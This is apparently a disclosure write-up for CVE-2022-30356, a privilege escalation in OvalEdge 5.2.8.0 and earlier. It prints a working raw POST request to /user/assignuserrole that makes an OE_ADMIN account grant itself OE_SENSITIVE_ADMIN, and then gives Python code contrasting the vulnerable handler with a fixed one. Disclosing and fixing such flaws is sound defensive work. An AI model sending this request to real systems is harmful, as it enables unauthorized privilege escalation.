
‼️Privilege Escalation

OvalEdge 5.2.8.0 and earlier is affected by privilege escalation vulnerabilities.

Privilege Escalation - OE_ADMIN role can escalate privileges to any defined role (authenticated)

CVE-2022-30356

OvalEdge 5.2.8.0 and earlier is affected by a privilege escalation vulnerability via a POST request to /user/assignuserrole using the userid, role and action parameters. Authentication is required with the OE_ADMIN role. Any OE_ADMIN user can assign any defined role to any account, including their own: the request below adds OE_SENSITIVE_ADMIN to the calling admin account (userid=admin, role=OE_SENSITIVE_ADMIN, action=ADD), so the lower-privileged admin role is enough to reach the highest role defined in the product.

RAW Request

POST https://example.com/ovaledge/user/assignuserrole HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 47
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/ovaledge/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: oe-loc=en; JSESSIONID=OGQ4MmFkNzYtNThjNS00MjU2LTljNGMtMGMwZjdhYjllZTk2

userid=admin&role=OE_SENSITIVE_ADMIN&action=ADD
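The check that is missing here, and one way to add it, as an added example that is not OvalEdge's code: a constructed Python model of a role-assignment handler in the shape of /user/assignuserrole. The vulnerable form only verifies that the caller holds OE_ADMIN; the fixed form also verifies that the caller's roles are allowed to grant (or revoke) the requested role and that a caller cannot add roles to their own account. Only the OE_ADMIN and OE_SENSITIVE_ADMIN role names come from this page; OE_USER, the GRANTABLE policy, the Session shape and the handler signatures are assumptions for illustration.

```python
# Added example, not OvalEdge code. A constructed model of a role-assignment
# handler in the shape of POST /user/assignuserrole, showing the check whose
# absence produces CVE-2022-30356 and one way to add it. Everything except the
# OE_ADMIN and OE_SENSITIVE_ADMIN role names (OE_USER, the GRANTABLE policy,
# the Session shape, the handler signatures) is an assumption for illustration.
from dataclasses import dataclass
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the assignment."""


@dataclass
class Session:
    userid: str
    roles: set  # roles held by the authenticated caller


# Assumed policy: which roles each granting role may ADD or REMOVE.
# OE_ADMIN is deliberately not allowed to hand out OE_SENSITIVE_ADMIN (or OE_ADMIN).
GRANTABLE = {
    "OE_SENSITIVE_ADMIN": {"OE_SENSITIVE_ADMIN", "OE_ADMIN", "OE_USER"},
    "OE_ADMIN": {"OE_USER"},
}

# Body taken from the raw request on this page.
CAPTURED_BODY = "userid=admin&role=OE_SENSITIVE_ADMIN&action=ADD"


def parse_body(body: str) -> dict:
    """Parse the application/x-www-form-urlencoded body into the three parameters."""
    params = parse_qs(body, strict_parsing=True)
    try:
        return {k: params[k][0] for k in ("userid", "role", "action")}
    except KeyError as exc:
        raise ValueError(f"missing parameter {exc}") from None


def apply_action(target: set, role: str, action: str) -> set:
    """Apply ADD/REMOVE to the target account's role set and return a copy."""
    if action == "ADD":
        target.add(role)
    elif action == "REMOVE":
        target.discard(role)
    else:
        raise ValueError("action must be ADD or REMOVE")
    return set(target)


def assign_user_role_vulnerable(session: Session, body: str, users: dict) -> set:
    """Vulnerable shape: only checks that the caller holds OE_ADMIN.

    The requested role is never compared with what the caller may grant, and
    userid may be the caller's own account, so OE_ADMIN -> OE_SENSITIVE_ADMIN
    succeeds.
    """
    if "OE_ADMIN" not in session.roles:
        raise Forbidden("OE_ADMIN required")
    p = parse_body(body)
    return apply_action(users.setdefault(p["userid"], set()), p["role"], p["action"])


def assign_user_role_fixed(session: Session, body: str, users: dict) -> set:
    """Hardened shape: the requested role must be grantable by the caller's
    roles (for ADD and REMOVE alike), and a caller may not ADD roles to their
    own account."""
    p = parse_body(body)
    if p["action"] not in ("ADD", "REMOVE"):
        raise ValueError("action must be ADD or REMOVE")
    allowed = set().union(*(GRANTABLE.get(r, set()) for r in session.roles))
    if p["role"] not in allowed:
        raise Forbidden(f"{sorted(session.roles)} may not assign {p['role']}")
    if p["userid"] == session.userid and p["action"] == "ADD":
        raise Forbidden("self-assignment of roles is not allowed")
    return apply_action(users.setdefault(p["userid"], set()), p["role"], p["action"])


def denied(handler, session: Session, body: str, users: dict) -> bool:
    """True if the handler refuses the request with Forbidden."""
    try:
        handler(session, body, users)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    admin = Session("admin", {"OE_ADMIN"})
    print("vulnerable grants:", assign_user_role_vulnerable(admin, CAPTURED_BODY, {}))
    print("fixed denies:", denied(assign_user_role_fixed, admin, CAPTURED_BODY, {}))
```

The grant policy is enforced for REMOVE as well as ADD, because an OE_ADMIN that can strip OE_SENSITIVE_ADMIN from the sensitive admins is a related abuse of the same endpoint; restricting the policy to ADD alone would leave that path open.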
